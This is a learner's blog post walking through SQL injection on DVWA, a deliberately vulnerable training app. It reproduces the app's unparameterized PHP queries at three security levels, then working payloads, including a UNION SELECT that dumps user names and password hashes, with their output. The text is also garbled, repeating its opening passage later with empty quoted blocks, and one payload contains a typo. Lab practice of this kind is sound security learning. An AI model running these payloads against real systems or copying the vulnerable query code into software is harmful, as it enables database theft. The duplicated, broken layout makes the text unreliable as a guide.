SQL injection
This time I will tell you a little about sql injection I am studying. I learned to direct practice in DVWA (Damn Vulnerable Web Applicaion). I started from a low level, and here are the php syntax that must be injected :
"
"
at this level no matter what we enter is filtered by the program so that we can enter a query that can cause programs to display all the contents of the database for exemple we can we can insert :
1' or '1'='1
so the sql query to be :
The following results:
"
"
at this level there is little filters that cause we can not enter the quotes, but it is not a problem because we do not need it anymore for this syntax. We get through by entering the following syntax:
1 or 1=1
so the sql query to be :
at the medium level is not much different from the low level. after graduating from the low and medium level is now high time to enter the territory level, and php source code follows:
"
"
for this high level I have not been able to solve real, but if in a dream I've had 3 times the dream of getting a way to inject the source code.
"
<?php if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i = 0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
} ?>
"
at this level no matter what we enter is filtered by the program so that we can enter a query that can cause programs to display all the contents of the database for exemple we can we can insert :
1' or '1'='1
so the sql query to be :
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1'
The following results:
ID: 1' or '1' ='1 First name: admin Surname: admin
ID: 1' or '1' ='1 First name: Gordon Surname: Brown
ID: 1' or '1' ='1 First name: Hack Surname: Me
ID: 1' or '1' ='1 First name: Pablo Surname: Picasso
ID: 1' or '1' ='1 First name: Bob Surname: Smiththis will cause the condition to be true so and cause the application displays all the contents of the database. Low levels has been solved here, now we enter to the medium level and here's a php syntax that we must penetrate to inject the database :
"
<?php if (isset($_GET['Submit'])) {
// Retrieve data
$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i=0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
} ?>
"
at this level there is little filters that cause we can not enter the quotes, but it is not a problem because we do not need it anymore for this syntax. We get through by entering the following syntax:
1 or 1=1
so the sql query to be :
SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1
ID: 1 or 1=1 First name: admin Surname: admin
ID: 1 or 1=1 First name: Gordon Surname: Brown
ID: 1 or 1=1 First name: Hack Surname: Me
ID: 1 or 1=1 First name: Pablo Surname: Picasso
ID: 1 or 1=1 First name: Bob Surname: Smith
or by this way :
SELECT first_name, last_name FROM users WHERE user_id = 1 union all select eser,password from users--
ID: 1 union all select user,password from users-- First name: admin Surname: adminID: 1 union all select user,password from users-- First name: admin Surname: 900150983cd24fb0d6963f7d28e17f72ID: 1 union all select user,password from users-- First name: gordonb Surname: e99a18c428cb38d5f260853678922e03ID: 1 union all select user,password from users-- First name: 1337 Surname: 8d3533d75ae2c3966d7e0d4fcc69216bID: 1 union all select user,password from users-- First name: pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7ID: 1 union all select user,password from users-- First name: smithy Surname: 5f4dcc3b5aa765d61d8327deb882cf99
at the medium level is not much different from the low level. after graduating from the low and medium level is now high time to enter the territory level, and php source code follows:
"
<?php if (isset($_GET['Submit'])) {
// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i=0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
} ?>
"
for this high level I have not been able to solve real, but if in a dream I've had 3 times the dream of getting a way to inject the source code.
Comments
Post a Comment